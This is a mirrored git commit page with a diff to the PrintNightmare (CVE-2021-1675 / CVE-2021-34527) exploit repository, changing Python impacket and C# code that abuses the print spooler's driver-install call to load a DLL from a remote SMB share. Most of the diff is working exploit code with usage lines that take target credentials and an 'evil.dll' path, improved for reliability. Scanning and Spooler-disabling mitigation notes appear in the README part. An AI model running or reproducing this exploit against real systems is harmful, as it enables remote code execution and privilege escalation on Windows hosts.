mirror of
https://github.com/cube0x0/CVE-2021-1675.git
synced 2024-12-22 10:46:32 +00:00
C# success rate and PoC improvement
Signed-off-by: cube0x0 <vidfelt@protonmail.com>
This commit is contained in:
parent
c6bb4923d8
commit
2180daa238
6 changed files with 51 additions and 37 deletions
|
@ -5,7 +5,6 @@ from impacket.dcerpc.v5.dtypes import NULL
|
||||||
from impacket.structure import Structure
|
from impacket.structure import Structure
|
||||||
import argparse
|
import argparse
|
||||||
import sys
|
import sys
|
||||||
import time
|
|
||||||
import pathlib
|
import pathlib
|
||||||
|
|
||||||
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
|
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
|
||||||
|
@ -67,23 +66,7 @@ def getDrivers(dce, handle=NULL):
|
||||||
return blob
|
return blob
|
||||||
|
|
||||||
|
|
||||||
def main(username, password, domain, lmhash, nthash, address, port, share):
|
def main(dce, pDriverPath, share):
|
||||||
#connect
|
|
||||||
dce = connect(username, password, domain, lmhash, nthash, address, port)
|
|
||||||
#handle = "\\\\{0}\x00".format(address)
|
|
||||||
handle = NULL
|
|
||||||
|
|
||||||
#find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
|
|
||||||
try:
|
|
||||||
blob = getDrivers(dce, handle)
|
|
||||||
pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
|
|
||||||
except Exception as e:
|
|
||||||
print('[-] Failed to enumerate remote pDriverPath')
|
|
||||||
print(str(e))
|
|
||||||
sys.exit(1)
|
|
||||||
|
|
||||||
print("[+] pDriverPath Found {0}".format(pDriverPath))
|
|
||||||
|
|
||||||
#build DRIVER_CONTAINER package
|
#build DRIVER_CONTAINER package
|
||||||
container_info = rprn.DRIVER_CONTAINER()
|
container_info = rprn.DRIVER_CONTAINER()
|
||||||
container_info['Level'] = 2
|
container_info['Level'] = 2
|
||||||
|
@ -93,14 +76,15 @@ def main(username, password, domain, lmhash, nthash, address, port, share):
|
||||||
container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
|
container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
|
||||||
container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00'
|
container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00'
|
||||||
container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share)
|
container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share)
|
||||||
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00"
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\winhttp.dll\x00"
|
||||||
|
|
||||||
flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
|
flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
|
||||||
filename = share.split("\\")[-1]
|
filename = share.split("\\")[-1]
|
||||||
print("[*] Executing {0}".format(share))
|
|
||||||
|
|
||||||
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
|
||||||
print("[*] Stage0: {0}".format(resp['ErrorCode']))
|
print("[*] Stage0: {0}".format(resp['ErrorCode']))
|
||||||
|
|
||||||
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00"
|
||||||
for i in range(1, 30):
|
for i in range(1, 30):
|
||||||
try:
|
try:
|
||||||
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
|
||||||
|
@ -118,9 +102,11 @@ if __name__ == '__main__':
|
||||||
parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
|
parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
|
||||||
Example;
|
Example;
|
||||||
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll'
|
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll'
|
||||||
|
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'
|
||||||
""")
|
""")
|
||||||
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
|
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
|
||||||
parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')
|
parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')
|
||||||
|
parser.add_argument('pDriverPath', action='store', help='Driver path. Example \'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\'', nargs="?")
|
||||||
group = parser.add_argument_group('authentication')
|
group = parser.add_argument_group('authentication')
|
||||||
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
|
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
|
||||||
group = parser.add_argument_group('connection')
|
group = parser.add_argument_group('connection')
|
||||||
|
@ -161,12 +147,34 @@ Example;
|
||||||
lmhash = ''
|
lmhash = ''
|
||||||
nthash = ''
|
nthash = ''
|
||||||
|
|
||||||
|
#connect
|
||||||
|
dce = connect(username, password, domain, lmhash, nthash, options.target_ip, options.port)
|
||||||
|
#handle = "\\\\{0}\x00".format(address)
|
||||||
|
handle = NULL
|
||||||
|
|
||||||
|
#find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
|
||||||
|
if not options.pDriverPath:
|
||||||
|
try:
|
||||||
|
blob = getDrivers(dce, handle)
|
||||||
|
pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
|
||||||
|
if not "filerepository" in pDriverPath:
|
||||||
|
print("[-] pDriverPath {0}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....".format(pDriverPath))
|
||||||
|
print("[-] Specify pDriverPath manually")
|
||||||
|
sys.exit(1)
|
||||||
|
except Exception as e:
|
||||||
|
print('[-] Failed to enumerate remote pDriverPath')
|
||||||
|
print(str(e))
|
||||||
|
sys.exit(1)
|
||||||
|
else:
|
||||||
|
pDriverPath = options.pDriverPath
|
||||||
|
|
||||||
|
print("[+] pDriverPath Found {0}".format(pDriverPath))
|
||||||
|
print("[*] Executing {0}".format(options.share))
|
||||||
|
|
||||||
#re-run if stage0/stageX fails
|
#re-run if stage0/stageX fails
|
||||||
print("[*] Try 1...")
|
print("[*] Try 1...")
|
||||||
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
|
main(dce, pDriverPath, options.share)
|
||||||
time.sleep(10)
|
|
||||||
print("[*] Try 2...")
|
print("[*] Try 2...")
|
||||||
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
|
main(dce, pDriverPath,options.share)
|
||||||
time.sleep(10)
|
|
||||||
print("[*] Try 3...")
|
print("[*] Try 3...")
|
||||||
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
|
main(dce, pDriverPath,options.share)
|
|
@ -1,4 +1,4 @@
|
||||||
# CVE-2021-1675
|
# CVE-2021-1675 / CVE-2021-34527
|
||||||
|
|
||||||
Impacket implementation of the [PrintNightmare ](https://github.com/afwu/PrintNightmare) PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)
|
Impacket implementation of the [PrintNightmare ](https://github.com/afwu/PrintNightmare) PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)
|
||||||
|
|
||||||
|
@ -86,9 +86,9 @@ REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_
|
||||||
|
|
||||||
### Scanning
|
### Scanning
|
||||||
|
|
||||||
We can use `rpcdump.py` from impacket to scan for vulnerable hosts, if it returns a value, it's vulnerable
|
We can use `rpcdump.py` from impacket to scan for potential vulnerable hosts, if it returns a value, it could be vulnerable
|
||||||
|
|
||||||
```
|
```bash
|
||||||
rpcdump.py @192.168.1.10 | grep MS-RPRN
|
rpcdump.py @192.168.1.10 | grep MS-RPRN
|
||||||
|
|
||||||
Protocol: [MS-RPRN]: Print System Remote Protocol
|
Protocol: [MS-RPRN]: Print System Remote Protocol
|
||||||
|
@ -100,7 +100,7 @@ Disable Spooler service
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
Stop-Service Spooler
|
Stop-Service Spooler
|
||||||
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start " /t REG_DWORD /d "4" /f
|
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f
|
||||||
```
|
```
|
||||||
|
|
||||||
Or Uninstall Print-Services
|
Or Uninstall Print-Services
|
||||||
|
|
Binary file not shown.
|
@ -1,7 +1,9 @@
|
||||||
# C# Implementation of CVE-2021-1675
|
# C# Implementation of CVE-2021-1675 / CVE-2021-34527
|
||||||
|
|
||||||
### Usage
|
### Usage
|
||||||
|
|
||||||
|
The RCE functionality might need to be executed with local administrator privileges on YOUR machine.
|
||||||
|
|
||||||
```
|
```
|
||||||
#LPE
|
#LPE
|
||||||
C:\SharpPrintNightmare.exe C:\addCube.dll
|
C:\SharpPrintNightmare.exe C:\addCube.dll
|
||||||
|
|
Binary file not shown.
|
@ -82,13 +82,17 @@ namespace SharpPrintNightmare
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
//lucky shot
|
//could not find driver path
|
||||||
if (pDriverPath == "")
|
if (pDriverPath == "")
|
||||||
{
|
{
|
||||||
pDriverPath = drivers[0].pDriverPath;
|
Console.WriteLine($"[-] [-] pDriverPath {pDriverPath}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....");
|
||||||
|
Console.WriteLine($"[-] Specify pDriverPath manually");
|
||||||
|
Environment.Exit(1);
|
||||||
}
|
}
|
||||||
pDriverPath = Directory.GetParent(pDriverPath).FullName + "\\UNIDRV.DLL";
|
|
||||||
}
|
}
|
||||||
|
Console.WriteLine($"[*] pDriverPath {pDriverPath}");
|
||||||
|
Console.WriteLine($"[*] Executing {dllpath}");
|
||||||
|
|
||||||
if (args.Length > 2)
|
if (args.Length > 2)
|
||||||
{
|
{
|
||||||
path = args[2];
|
path = args[2];
|
||||||
|
@ -117,13 +121,11 @@ namespace SharpPrintNightmare
|
||||||
|
|
||||||
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug
|
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug
|
||||||
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug
|
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug
|
||||||
Console.WriteLine($"[*] pDriverPath {pDriverPath}");
|
|
||||||
Console.WriteLine($"[*] Executing {dllpath}");
|
|
||||||
|
|
||||||
//DRIVER_INFO_2 Level2 = drivers[0]; // debug
|
//DRIVER_INFO_2 Level2 = drivers[0]; // debug
|
||||||
DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
|
DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
|
||||||
Level2.cVersion = 3;
|
Level2.cVersion = 3;
|
||||||
Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
|
Level2.pConfigFile = "C:\\Windows\\System32\\winhttp.dll"; //replace kernelbase with winhttp
|
||||||
Level2.pDataFile = dllpath;
|
Level2.pDataFile = dllpath;
|
||||||
Level2.pDriverPath = pDriverPath;
|
Level2.pDriverPath = pDriverPath;
|
||||||
Level2.pEnvironment = "Windows x64";
|
Level2.pEnvironment = "Windows x64";
|
||||||
|
@ -141,6 +143,8 @@ namespace SharpPrintNightmare
|
||||||
Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error());
|
Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error());
|
||||||
Marshal.FreeHGlobal(pnt);
|
Marshal.FreeHGlobal(pnt);
|
||||||
|
|
||||||
|
//Specify a dll that does not exists in C:\\Windows\\System32\\spool\\drivers\\x64\\3\\
|
||||||
|
Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
|
||||||
for (int i = 1; i <= 30; i++)
|
for (int i = 1; i <= 30; i++)
|
||||||
{
|
{
|
||||||
//add path to our exploit
|
//add path to our exploit
|
||||||
|
|
Loading…
Reference in a new issue